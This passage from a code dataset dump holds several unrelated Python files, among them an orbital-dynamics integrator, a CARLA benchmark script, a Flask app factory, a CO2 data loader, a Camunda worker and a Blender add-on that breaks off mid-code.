dynamical state of the system.\n    dt : float, optional\n        The timestep to use for the integration. Either dt or dtFraction must be\n        specified.\n    dtFraction : float, optional\n        Set the timestep to a constant fraction of the period of the shortest-period linear\n        secular eigenmode.\n    max_order : int, optional\n        The maximum order of disturbing function terms to include in the integration.\n        By default, the equations of motion include terms up to 4th order.\n    resonances_to_include : dict, optional\n        A dictionary containing information that sets the list of MMRs for which the\n        secular contribution will be accounted for (at second order on planet masses).\n        Dictionary key and value pairs are specified in the form\n\n        .. code::\n\n            {(iIn,iOut) : [(j_0,k_0),...(j_N,k_N)]}\n\n        include the resonances :math:`j_i` : :math:`j_i-k_i` with :math:`i=0,...,N` between planets\n        iIn and iOut. Note that harmonics should **NOT** be explicitly included. 
I.e.,\n if (2,1) appears in the list [(j_0,k_0),...(j_N,k_N)] then the term (4,2) should\n **NOT** also appear; these terms' contributions will be added automatically when \n the (2,1) term is added.\n By default, no MMRs are included.\n \n DFOp_kwargs : dict, optional\n Keyword arguments specifying options for the Runge-Kutta integrator.\n Arguments include:\n - :code:`rtol`: Sets relative tolerance for root-finding \n in the implicit Runge-Kutta step. Default is machine precision.\n \n - :code:`atol`: Sets the absolute tolerance for root-finding\n in the implicit Runge-Kutta step. Default is 0 so that tolerance\n is only specified by :code:`rtol`.\n \n - :code:`max_iter`: Maximum number of iterations for root-finding. Default is 10.\n \n - :code:`rkmethod`: Runge-Kutta method to use. Available options include:\n - 'ImplicitMidpoint'\n - 'LobattoIIIB'\n - 'GL4'\n - 'GL6'\n 'GL4' and 'GL6' are `Gauss-Legendre methods `_ of order 4 and 6, respectively.\n 'ImplicitMidpoint', 'GL4', and 'GL6' are symplectic methods while 'LobattoIIIB' is a 4th order time-reversible method (but not symplectic).\n \n - :code:`rk_root_method`: Method to use for root-finding during implicit RK step. Available options are:\n - 'Newton'\n - 'fixed_point'\n 'Newton' (default) uses Newton's method whereas 'fixed_point' uses a fixed point iteration method. \n Newton's method requires computing the Jacobian of the equations of motion but has quadratic convergence.\n \"\"\"\n def __init__(self, state, dt = None, dtFraction = None, max_order = 4,NsubB=1, resonances_to_include={}, DFOp_kwargs = {}):\n assert max_order > 1, \"'max_order' must be greater than or equal to 2.\"\n if not single_true([dt,dtFraction]):\n raise AttributeError(\"Can only pass one of dt or dtFraction\")\n llsys = LaplaceLagrangeSystem.from_Poincare(state)\n first_order_resonances_to_include = {}\n for pair,res_list in resonances_to_include.items():\n first_order_js = [ j for j,k in res_list if k==1]\n first_order_resonances_to_include.update({pair:first_order_js})\n for j in first_order_js:\n llsys.add_first_order_resonance_term(*pair,j)\n Tsec_e = np.min(np.abs(2 * np.pi / llsys.eccentricity_eigenvalues()))\n Tsec_inc = np.min(np.abs(2 * np.pi / llsys.inclination_eigenvalues()[1:]))\n self.Tsec = min(Tsec_e,Tsec_inc)\n\n if dt:\n self._dt = dt\n elif dtFraction:\n self._dt = dtFraction * self.Tsec\n else:\n raise AttributeError(\"Must specify either 'dt' or 'dtFraction'\")\n self.nonlinearSecOp = DFOp.fromOrderRange(\n state,\n self._dt,\n 2,max_order,\n resonances_to_include=resonances_to_include,\n **DFOp_kwargs\n )\n self.state = state\n self.t = 0\n\n @classmethod\n def from_Simulation(cls,sim, dt = None, dtFraction = None, max_order = 4,NsubB=1,resonances_to_include={}, DFOp_kwargs = {}):\n pvars = Poincare.from_Simulation(sim)\n return cls(\n pvars,\n max_order = max_order,\n dt = dt,\n dtFraction = dtFraction,\n resonances_to_include=resonances_to_include,\n DFOp_kwargs = DFOp_kwargs\n )\n\n @property\n def state_vector(self):\n state_vec = []\n for p in self.state.particles[1:]:\n state_vec += [p.kappa,p.eta,p.Lambda,p.l,p.sigma,p.rho]\n return np.array(state_vec)\n @property\n def dt(self):\n return self._dt\n @dt.setter\n def dt(self,value):\n self._dt = value\n self.nonlinearSecOp.dt = self._dt\n\n def update_state_from_vector(self,state_vec):\n vecs = np.reshape(state_vec,(-1,6))\n for vals,p in zip(vecs,self.state.particles[1:]):\n p.kappa,p.eta,p.Lambda,p.l,p.sigma,p.rho = vals\n\n def integrate(self,time,exact_finish_time = 
False):\n        \"\"\"\n        Advance simulation by integrating to specified time.\n\n        Arguments\n        ---------\n        time : float\n            Time to integrate to\n        exact_finish_time : bool, optional\n            **NOT CURRENTLY IMPLEMENTED**\n            If :code:`True`, system will be advanced to user-specified time exactly.\n            If :code:`False`, system will advance by a fixed number of time steps\n            to the first time after the user-specified `time` argument.\n            Default is :code:`False`.\n\n        Returns\n        -------\n        None\n        \"\"\"\n        assert time >= self.t, \"Backward integration is currently not implemented.\"\n        Nstep = int( np.ceil( (time-self.t) / self.dt) )\n        state_vec = self.state_vector\n        nlOp = self.nonlinearSecOp\n        qp = nlOp.state_vec_to_qp_vec(state_vec)\n        for _ in range(Nstep):\n            qp = nlOp.rk_step(qp)\n\n        if exact_finish_time:\n            warnings.warn(\"Exact finish time is not currently implemented.\")\n        for i in range(nlOp.Npl):\n            # eta\n            state_vec[6*i+1] = qp[i]\n            # kappa\n            state_vec[6*i] = qp[i + 2 * nlOp.Npl]\n            # rho\n            state_vec[6*i+5] = qp[i + nlOp.Npl]\n            # sigma\n            state_vec[6*i+4] = qp[i + 3 * nlOp.Npl]\n\n        self.update_state_from_vector(state_vec)\n        self.t += Nstep * self.dt\n    def calculate_energy(self):\n        sv = self.state_vector\n        E = self.nonlinearSecOp.calculate_Hamiltonian(sv)\n        return E\n    def calculate_AMD(self):\n        return np.sum([p.Q + p.Gamma for p in self.state.particles[1:]])\n\n","sub_path":"celmech/secular.py","file_name":"secular.py","file_ext":"py","file_size_in_byte":44461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"387523370","text":"import argparse\nimport logging\n\nfrom carla.driving_benchmark import run_driving_benchmark\nfrom carla.driving_benchmark.experiment_suites import CoRL2017, BasicExperimentSuite\nfrom carla.driving_benchmark.experiment_suites import DAC2018\n\nfrom agents.imitation.imitation_learning import ImitationLearning\n\ntry:\n    from carla import carla_server_pb2 as carla_protocol\nexcept ImportError:\n    raise RuntimeError(\n        'cannot import \"carla_server_pb2.py\", run the protobuf compiler to generate this file')\n\nif (__name__ == '__main__'):\n    argparser = argparse.ArgumentParser(description=__doc__)\n    argparser.add_argument(\n        '-v', '--verbose',\n        action='store_true',\n        dest='debug',\n        help='print debug information')\n    argparser.add_argument(\n        '--host',\n        metavar='H',\n        default='localhost',\n        help='IP of the host server (default: localhost)')\n    argparser.add_argument(\n        '-p', '--port',\n        metavar='P',\n        default=2000,\n        type=int,\n        help='TCP port to listen to (default: 2000)')\n    argparser.add_argument(\n        '-c', '--city-name',\n        metavar='C',\n        default='Town01',\n        help='The town that is going to be used on benchmark'\n             + '(needs to match active town in server, options: Town01 or Town02)')\n    argparser.add_argument(\n        '-n', '--log_name',\n        metavar='T',\n        default='test',\n        help='The name of the log file to be created by the scripts'\n    )\n    argparser.add_argument(\n        '--avoid-stopping',\n        default=True,\n        action='store_false',\n        help=' Uses the speed prediction branch to avoid unwanted agent stops'\n    )\n    argparser.add_argument(\n        '--dac-2018',\n        action='store_true',\n        help='If you want to benchmark the dac-2018 instead of the Basic one'\n    )\n    argparser.add_argument(\n        '--continue-experiment',\n        action='store_true',\n        help='If you want to continue the experiment with the given log name'\n    )\n    argparser.add_argument(\n        '-f', '--folder-name',\n        metavar='F',\n        default='double-lines-width_go-straight',\n        help='folder in which current experiment data would be 
stored'\n )\n argparser.add_argument(\n '-t', '--task',\n metavar='T',\n default='go-straight',\n help='task to perform: go-straight, turn-left, turn-right'\n )\n argparser.add_argument(\n '-i', '--iterations',\n metavar='I',\n default=349,\n type=int,\n help='total number of iterations'\n )\n argparser.add_argument(\n '-w', '--weather',\n metavar='W',\n default=1,\n type=int,\n help='Use weathers, 1- ClearNoon, 6 - HeavyRainNoon, 8 - ClearSunset'\n )\n argparser.add_argument(\n \t'-s', '--sample',\n \ttype=int,\n \tdefault=0\n )\n\n args = argparser.parse_args()\n #print(args.sample)\n #print(type(args.sample))\n #g=input()\n\n log_level = logging.DEBUG if args.debug else logging.INFO\n logging.basicConfig(format='%(levelname)s: %(message)s', level=log_level)\n\n logging.info('listening to server %s:%s', args.host, args.port)\n\n agent = ImitationLearning(args.city_name, args.avoid_stopping, args.folder_name, opt = args.sample)\n\n # We instantiate an experiment suite. Basically a set of experiments\n # that are going to be evaluated on this benchmark.\n experiment_suite = DAC2018(args.city_name, args.task, args.weather, args.iterations)\n\n # Now actually run the driving_benchmark\n run_driving_benchmark(agent, experiment_suite, args.city_name,\n args.log_name, args.continue_experiment,\n args.host, args.port)\n","sub_path":"calibration/imitation_homographyMat/run_CIL.py","file_name":"run_CIL.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"316661741","text":"import datetime\nimport calendar\n\nstart = datetime.date(2016, 8, 1)\nweekday = calendar.weekday(start.year, start.month, start.day)\n\nd = datetime.timedelta(days=1)\n\nfor week in range(52):\n week_no = week + 1\n print('Week %2d: ' %(week_no))\n print( 'MON' + '\\t' * 2 + 'TUE' + '\\t' * 2 + 'WED' + '\\t' * 2 + \\\n \t\t'THU' + '\\t' * 2 + 'FRI' + '\\t' * 2 + 'SAT' + '\\t' * 2 + 'SUN')\n for i in range(7):\n print(start, end='\\t')\n start += d\n if i == 6:\n print('\\n')","sub_path":"week calculation.py","file_name":"week calculation.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"65710633","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom os import path\n\n\nclass Utils:\n game_config_data = None\n graph_config_data = None\n image_folder = path.join(\"..\", \"Images\")\n btn_1_img = 'button1.jpg'\n btn_2_img = 'button2.jpg'\n btn_3_img = 'button3.jpg'\n btn_4_img = 'button4.jpg'\n\n\n @staticmethod\n def read_game_config_file(config_path):\n my_config = Utils.read_file(config_path)\n Utils.game_config_data = my_config\n Utils.image_folder = Utils.game_config_data['Default']['image_folder']\n return my_config\n\n @staticmethod\n def read_graph_config_file(config_path):\n my_config = Utils.read_file(config_path)\n Utils.graph_config_data = my_config\n return my_config\n\n @staticmethod\n def read_file(config_path):\n config_dict = {}\n with open(config_path, 'r') as f:\n for line in f:\n new_line = Utils.parse_line(line)\n key = new_line.keys()\n if not key[0] in config_dict:\n config_dict[key[0]] = {}\n inner_key = new_line[key[0]].keys()\n config_dict[key[0]][inner_key[0]] = new_line[key[0]][inner_key[0]].rstrip()\n return config_dict\n\n @staticmethod\n def parse_line(line):\n point_index = line.find(\".\")\n equal_index = line.find(\"=\")\n new_dict = {}\n new_dict[line[:point_index]] = {}\n 
new_dict[line[:point_index]][line[point_index+1:equal_index]] = line[equal_index+1:]\n return new_dict\n\n @staticmethod\n def max_nodes_per_size(size):\n max_nodes = 0\n return max_nodes\n\n @staticmethod\n def get_enum_items(enum_object):\n list = enum_object.__dict__.keys()\n list.remove(\"__doc__\")\n list.remove(\"__module__\")\n return list\n\n @staticmethod\n def format_log_msg(msg, **kwargs):\n new_message = msg\n for key, value in kwargs.iteritems():\n new_message = \"{0}, {1}={2}\".format(new_message, key, value)\n return new_message\n","sub_path":"SupplementaryFiles/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"416593496","text":"from flask import Flask\nfrom flask_cors import CORS\nfrom flask_limiter import Limiter\nfrom flask_limiter.util import get_remote_address\nfrom werkzeug.middleware.proxy_fix import ProxyFix\n\nfrom models import db\nfrom models.admin import Admin\nfrom routes import users, auth, admin\n\n\ndef create_app():\n app = Flask(__name__)\n\n if app.env == 'development':\n app.config.from_object('config.DevelopConfig')\n else:\n app.config.from_object('config.BaseConfig')\n\n # init ORM\n with app.app_context():\n db.init_app(app)\n db.create_all()\n\n # check if admin entry already exists and if not, add it\n if not Admin.query.filter_by(created=True).first():\n admin_instance = Admin()\n db.session.add(admin_instance)\n db.session.commit()\n\n Limiter(app, default_limits=app.config.get('REQUEST_LIMITS'), key_func=get_remote_address)\n\n app.wsgi_app = ProxyFix(app.wsgi_app, x_for=app.config.get('NUM_PROXIES'))\n\n app.register_blueprint(auth.blueprint)\n app.register_blueprint(users.blueprint)\n app.register_blueprint(admin.blueprint)\n\n CORS(app)\n\n return app\n\n\nif __name__ == '__main__':\n so_auth = create_app()\n so_auth.run()\nelse:\n gunicorn_app = create_app()\n\n\n","sub_path":"so-auth/api/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"631650556","text":"class StudentModel:\n \"\"\"\n 学生数据模型\n 对具体学生信息进行抽象\n \"\"\"\n\n def __init__(self, name=\"\", age=0, score=0, sid=0):\n self.name = name\n self.age = age\n self.score = score\n # 学生编号:对数据进行唯一标识(全球唯一标识符)\n self.sid = sid # 自增长1001 1002 1003\n\n # 对某个数据进行有效性验证\n @property\n def score(self):\n return self.__score\n\n @score.setter\n def score(self, value):\n if value < 0:\n value = 0\n elif value > 100:\n value = 100\n self.__score = value","sub_path":"month_01/teacher/day14/commodity_info_manager/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"588285204","text":"\"\"\"Preprocess the data and insert in DB.\"\"\"\n\nimport pandas as pd\nimport sqlalchemy as sa\nimport pathlib as pathlib\n\n# Parameters\n\nPROJECT_DIR = pathlib.Path(__file__).parent.parent\nDB_FILE = PROJECT_DIR / \"data\" / \"db.sqlite\"\n\nDB_URI = f'sqlite:///{DB_FILE.absolute().as_posix()}'\nTABLE_NAME = 'CO2'\n\n\n## Places of the measurements as columns of the DataFrame\n## obtained from on onlinedata file as:\n## import codecs\n## with codecs.open(\"20181104_onlinedata.txt\", \"r\", \"latin1\") as f:\n## t = f.read()\n## t=t.splitlines()[20:0]\n## col = [s[3:] for s in t[:20]]\n\ncol = ['Centrale kraftværker DK1',\n 'Centrale 
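To make the Section.key=value convention expected by parse_line above concrete, a small usage example (the section and key names here are hypothetical):

# Hypothetical config line in the "Section.key=value" format:
line = "Default.image_folder=../Images\n"
print(Utils.parse_line(line))
# -> {'Default': {'image_folder': '../Images\n'}}
# read_file() later calls .rstrip() on the value, removing the newline.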
kraftværker DK2',\n 'Decentrale kraftværker DK1',\n 'Decentrale kraftværker DK2',\n 'Vindmøller DK1',\n 'Vindmøller DK2',\n 'Udveksling Jylland-Norge',\n 'Udveksling Jylland-Sverige',\n 'Udveksling Jylland-Tyskland',\n 'Udveksling Sjælland-Sverige',\n 'Udveksling Sjælland-Tyskland',\n 'Udveksling Bornholm-Sverige',\n 'Udveksling Fyn-Sjaelland',\n 'Temperatur i Malling',\n 'Vindhastighed i Malling',\n 'CO2 udledning',\n 'Havmøller DK',\n 'Landmøller DK',\n 'Solceller DK1',\n 'Solceller DK2']\n\ndef preprocess_file(file_name):\n '''\n Preprocess accepts a file that should be formatted as *onlinedata.txt and returns a DataFrame of its content.\n '''\n\n # Create DataFrame from file\n df = pd.read_csv(file_name, sep=';', skiprows=21, skip_blank_lines=True)\n \n # Remove useless columns and prettify it\n \n ## Remove useless column\n df.drop(['Unnamed: 21'], axis=1, inplace=True)\n ## Remove whitespace from columns' name\n df.rename(str.strip, axis='columns', inplace=True)\n ## Rename datetime column\n df.rename(index=str, columns={df.columns[0]: \"Timestamp\"}, inplace=True)\n ## Cast Timestamp column to datetime type and format for improved functionalties\n df[df.columns[0]] = pd.to_datetime(df[df.columns[0]])\n ## Set Timestamp column as index (useless?)\n df.set_index(df.columns[0], inplace=True)\n\n df.columns = col\n\n return df\n\ndef add_to_db(df, db_uri, table_name):\n '''\n Add DataFrame (returned by preprocess) to the database\n '''\n\n en = sa.create_engine(db_uri)\n\n df.to_sql(table_name, en, if_exists='append')\n","sub_path":"utils/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"602315017","text":"\n\nfrom xai.brain.wordbase.nouns._endeavour import _ENDEAVOUR\n\n#calss header\nclass _ENDEAVOURS(_ENDEAVOUR, ):\n\tdef __init__(self,): \n\t\t_ENDEAVOUR.__init__(self)\n\t\tself.name = \"ENDEAVOURS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"endeavour\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_endeavours.py","file_name":"_endeavours.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"536381793","text":"#!/usr/bin/env python\n#\n# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport shutil\nimport unittest\n\nfrom dwarf import db\n\n\nclass TestCase(unittest.TestCase):\n def setUp(self):\n super(TestCase, self).setUp()\n if os.path.exists('/tmp/dwarf'):\n shutil.rmtree('/tmp/dwarf')\n os.makedirs('/tmp/dwarf/images')\n os.makedirs('/tmp/dwarf/instances/_base')\n\n def tearDown(self):\n super(TestCase, self).tearDown()\n if os.path.exists('/tmp/dwarf'):\n shutil.rmtree('/tmp/dwarf')\n\n\ndef db_init():\n dwarf_db = db.Controller()\n dwarf_db.delete()\n dwarf_db.init()\n return dwarf_db\n\n\ndef to_headers(metadata):\n headers = []\n for (key, 
val) in metadata.iteritems():\n        if key == 'properties':\n            for (k, v) in val.iteritems():\n                headers.append(('x-image-meta-property-%s' % k, str(v)))\n        else:\n            headers.append(('x-image-meta-%s' % key, str(val)))\n    return headers\n","sub_path":"tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"573342984","text":"from mcpele1.montecarlo.template import *\nfrom mcpele1.conftest import check_spherical_container\n\nclass ConfTestOR(ConfTest):\n    m_tests: list = []\n\n    #check the variables for this method\n    def add_test(self, test_input):\n        self.m_tests.append(test_input)\n\n    def conf_test(self, trial_coords):\n        if len(self.m_tests) == 0:\n            print(\"no conf test specified\")\n        for test in self.m_tests:\n            result: bool = test.conf_test(trial_coords)\n            if result:\n                return True\n        return False\n","sub_path":"mcpele1/conftest/conf_test_OR.py","file_name":"conf_test_OR.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"174003775","text":"import itertools as itert\ndef insert_operators(s, ans):\n\toperators = list(itert.product(['+','-',''], repeat=(len(s) - 1)))\n\n\tfor x in operators:\n\t\tList = list((str(a),b) for a,b in itert.zip_longest(s, list(x), fillvalue=''))\n\t\tresult = ''.join([''.join(i) for i in List])\n\t\tif(eval(result) == ans):\n\t\t\tres = result + '=' + str(ans)\n\t\t\treturn res\n\n\treturn None","sub_path":"önn3/Python/InsertOP.py","file_name":"InsertOP.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"446743820","text":"# File picker for pythonista\n# coding by zencha201\n\nimport ui\nimport os\n\nclass FilePicker(ui.View):\n    def __init__(self, name='file picker', path=os.environ['HOME'] + '/Documents/', action=None):\n        self.path=path\n        tv=ui.TableView()\n        tv.frame=self.bounds\n        tv.flex='WH'\n        ds=ui.ListDataSource({})\n        ds.action=self.item_selected\n        tv.data_source=ds\n        tv.delegate=ds\n        self.table_view=tv\n        self.add_subview(self.table_view)\n\n        self.name=name\n        self.path=path\n        self.action=action\n        self.selected_path=''\n        self.update(self.path)\n\n    def get_selected_path(self):\n        return self.selected_path\n\n    def item_selected(self, sender):\n        item=sender.items[sender.selected_row]\n        if item['is_dir']:\n            self.update(item['full_path'])\n        else:\n            self.selected_path=item['full_path']\n            if self.action!=None:\n                self.action(self)\n\n    def update(self, path):\n        items=[]\n\n        item={'title':'..', 'image':'ionicons-arrow-up-b-32', 'is_dir':True , 'full_path':os.path.abspath(path+'../')+'/'}\n        items.append(item)\n\n        files=os.listdir(path)\n        for file in files:\n            full_path=path+file\n\n            is_dir=os.path.isdir(full_path)\n            image='ionicons-document-32'\n\n            if is_dir:\n                full_path=full_path+'/'\n                image='ionicons-ios7-folder-32'\n\n            item={'title':file, 'image':image, 'is_dir':is_dir, 'full_path':full_path}\n            items.append(item)\n\n        self.table_view.data_source.items=items\n        self.path=path\n\n\n","sub_path":"filepicker.py","file_name":"filepicker.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"380685487","text":"import json\n\nfrom camunda.external_task.external_task import 
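insert_operators above can be exercised directly: the empty string in the operator product concatenates adjacent digits, and eval scores each candidate (so digit sequences with leading zeros would raise a SyntaxError on Python 3). A few verifiable calls:

print(insert_operators([1, 2, 3], 6))    # -> '1+2+3=6'
print(insert_operators([1, 2, 3], 15))   # -> '12+3=15' (digits concatenated)
print(insert_operators([1, 2, 3], 100))  # -> None when no combination matches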
ExternalTask, TaskResult\nfrom sqlalchemy.orm.session import sessionmaker\nfrom camundaworkers.logger import get_logger\nfrom camundaworkers.model.base import create_sql_engine\nfrom camundaworkers.model.flight import OfferMatch\nfrom camundaworkers.model.offer_purchase_data import OfferPurchaseData\n\n\ndef rehabilitation_offer_code(task: ExternalTask) -> TaskResult:\n \"\"\"\n Compensation task: if the verification offer code and payment sub process fail, this task rehabilitates the offer\n code for another try.\n :param task: the current task instance\n :return: the task result\n \"\"\"\n logger = get_logger()\n logger.info(\"rehabilitation_offer_code\")\n\n offer_purchase_data = OfferPurchaseData.from_dict(json.loads(task.get_variable(\"offer_purchase_data\")))\n\n offer_code = offer_purchase_data.offer_code\n\n # Connects to postgreSQL\n Session = sessionmaker(bind=create_sql_engine())\n session = Session()\n\n \"\"\"\n Gets the offer match that has to be rehabilitated from the DB.\n The offer match is the one blocked and with offer_code equal to the process offer_code variable.\n \"\"\"\n affected_rows = session.query(OfferMatch).filter(OfferMatch.offer_code == offer_code).update({\"blocked\": False},\n synchronize_session=\"fetch\")\n if affected_rows < 1:\n session.rollback()\n logger.error(\n f\"{affected_rows} matches were found for the given offer code. The offer code will not be rehabilitated.\")\n return task.complete()\n\n logger.info(f\"{affected_rows} match was found for the given offer code.\")\n session.commit()\n return task.complete()\n","sub_path":"camundaworkers/workers/buy_offer/rehabilitation_offer_code.py","file_name":"rehabilitation_offer_code.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"242909487","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nswap_columns.py\n\nCreated by Vince Fernando on 2012-01-21.\n\"\"\"\n\n# CONSTANTS are in capital letters\nINPUT_FILE = '/Users/vincefernando/PYTHON/image.txt'\nOUTPUT_FILE = '/Users/vincefernando/PYTHON/image_modified.txt'\n\nimport csv \n\n# Open file safely\nwith open(INPUT_FILE, 'r') as f:\n # Read entire file \n # We go through the file and save to 'line' IF the line is\n # not empty. \n # Perhaps not safe for large files\n lines = [line for line in f.readlines() if line.strip()]\n\n# Initialise empty region list\nregions = []\n\n# Loop to find 'regions' (first field in line)\nfor line in lines:\n # Find first parameter in line and call it the region\n # Split the line on commas, and select 0 index in resulting\n # list. 
\n region = line.split(',')[0]\n # Check to see if the region exists, if not add to region list\n if region not in regions:\n regions.append(region)\n \n# Initialise the csv output writer and get the output_writer object\noutput_writer = csv.writer(open(OUTPUT_FILE, 'wb'), delimiter=',', quoting=csv.QUOTE_MINIMAL)\n\n\nfor line in lines:\n # Remove whitespace from line (especially '\\n')\n # Return a list (items) which is split upon finding commas\n items = line.strip().split(',')\n \n # Take the first item of items (the region)\n # Return the index of the region from the regions list\n # Turn the index into a string\n # Assign the index as the replacement of the region.\n items[0] = str(regions.index(items[0]))\n\n # Write the row to the file\n output_writer.writerow(items)\n\n\n# Lists\n# [, ]\n\n# Tuples\n# (, )\n\n# Dictionaries\n# { key: value, }\n\n\n \n\n\n","sub_path":"swap_columns.py","file_name":"swap_columns.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"76085637","text":"bl_info = {\n \"name\": \"Move X Axis\",\n \"category\": \"Object\",\n}\n\nPREFIX_U = 'u_r_'\nPREFIX_V = 'v_r_'\nPREFIX_RHO = 'rho_r_'\nPATH = '/home/behollis/DATA/in/ts00050/'\nDPATH = '/home/behollis/DATA/out/lockExSt/ts00050/'\n\nimport sys\n#H5PY_SOURCE_DIR = '/usr/local/lib/python2.7/dist-packages/h5py-2.3.1-py2.7-linux-x86_64.egg'\n#if H5PY_SOURCE_DIR not in sys.path:\n# sys.path.append(H5PY_SOURCE_DIR)\n\nPATH = '/home/behollis/Dropbox/eurovis2015shortpaperCode/src/'#os.path.dirname(__file__)\nif PATH not in sys.path:\n sys.path.append(PATH)\n \nimport loadStreamlines\nimport bpy\nimport h5py\n#import pydevd\n#import debugmaya\nfrom loadStreamlines import readStreamlines\nimport interpProbDensity\nfrom bpy_extras.io_utils import ImportHelper\nimport mathutils\n\n\nprob = None\nslines = None\nMEM = 10\n\n#\n# Store properties in the active scene\n#\ndef initSceneProperties(scn):\n bpy.types.Scene.seed_x = bpy.props.IntProperty(\n name = 'X', \n description = \"X seed location\")\n scn['seed_x'] = 30 \n \n bpy.types.Scene.seed_y = bpy.props.IntProperty(\n name = 'Y', \n description = \"Y seed location\")\n scn['seed_y'] = 25\n \n bpy.types.Scene.seed_z = bpy.props.IntProperty(\n name = 'Z', \n description = \"Z seed location\")\n scn['seed_z'] = 0\n \n bpy.types.Scene.members = bpy.props.IntProperty(\n name = 'Members', \n description = 'Number of members')\n scn['members'] = 10\n \n return\n \ninitSceneProperties(bpy.context.scene)\n\n#\n# Menu in UI region\n#\nclass Hdf5ImportPanel(bpy.types.Panel):\n bl_label = 'KDE Streamlines'\n bl_space_type = \"VIEW_3D\"\n bl_region_type = \"UI\"\n \n def draw(self, context):\n \n layout = self.layout\n \n #layout.label('')\n row = layout.row(align=True)\n row.alignment = 'EXPAND'\n row.operator('h5py.load', text='import', icon='FILE_FOLDER')\n \n scn = context.scene\n layout.prop(scn, 'seed_x')\n layout.prop(scn, 'seed_y')\n layout.prop(scn, 'seed_z')\n layout.prop(scn, 'members')\n \n row = layout.row(align=True)\n row.operator(\"object.loadsls\", text='load', icon='MESH_DATA')\n \n #row.operator(\"object.loadsls\", icon='LAMP_DATA')\n \nclass OBJECT_OT_LoadHdf5Button(bpy.types.Operator, ImportHelper):\n #http://wiki.blender.org/index.php/Dev:2.5/Py/Scripts/Cookbook/Code_snippets/Blender_add-ons\n \n bl_idname = \"h5py.load\"\n bl_label = \"Load hdf5 file\"\n \n # From ImportHelper. 
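The two-pass region indexing in swap_columns above (collect the unique first fields, then replace each with its list index) can also be done in a single pass with a dict; a small self-contained sketch on made-up rows:

region_ids = {}
rows = []
for line in ["north,1,2", "south,3,4", "north,5,6"]:
    items = line.strip().split(',')
    # setdefault hands out the next integer id the first time a region appears
    items[0] = str(region_ids.setdefault(items[0], len(region_ids)))
    rows.append(items)
print(rows)  # [['0', '1', '2'], ['1', '3', '4'], ['0', '5', '6']]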
Filter filenames.\n filename_ext = \".hdf5\"\n filter_glob = bpy.props.StringProperty(default='*.hdf5', options={'HIDDEN'})\n \n filepath = bpy.props.StringProperty(name='File Path', maxlen=1024, default=DPATH)\n \n def execute(self, context):\n import os\n global prob, slines, MEM\n \n f = h5py.File(self.properties.filepath, 'r')\n \n seed_x = bpy.context.scene['seed_x']\n seed_y = bpy.context.scene['seed_y']\n seed_z = bpy.context.scene['seed_z']\n slines = readStreamlines(seed_x, seed_y, f)\n print('loaded {0} slines'.format(len(slines)))\n \n f.close()\n \n return{'FINISHED'} \n \n def invoke(self, context, event):\n context.window_manager.fileselect_add(self)\n return {'RUNNING_MODAL'} \n\n\nclass KDEStreamlines(bpy.types.Operator):\n ''' ''' # blender will use this as a tooltip for menu items and buttons.\n bl_idname = \"object.loadsls\" # unique identifier for buttons and menu items to reference.\n bl_label = 'Load KDE Streamlines' # display name in the interface.\n bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.\n\n def createNewStreamline(self, name):\n me = bpy.data.meshes.new(name)\n ob = bpy.data.objects.new(name, me) \n \n # Link the object to the current scene and make it active. \n # Optionally, we can make the newly created object active \n # or selected. This code is the same for all kinds of objects.\n scn = bpy.context.scene\n scn.objects.link(ob)\n scn.objects.active = ob \n \n return ob, me\n \n def findVerts(self, sl):\n verts = list() \n for ptidx in range(0, len(sl[0])):\n vert = ( sl[0][ptidx], sl[1][ptidx], 0.0 )\n verts.append( vert )\n \n return verts\n \n def findEdges(self, sl):\n edges = list()\n for idx in range(1,len(sl[0])):\n edge = ( idx - 1, idx )\n edges.append( edge )\n \n return edges\n \n def addProbMaterial(self, slprobs, slobs, prob_list):\n ''' Adds material to each face of streamline quads based\n on cumulative density of velocities in field. 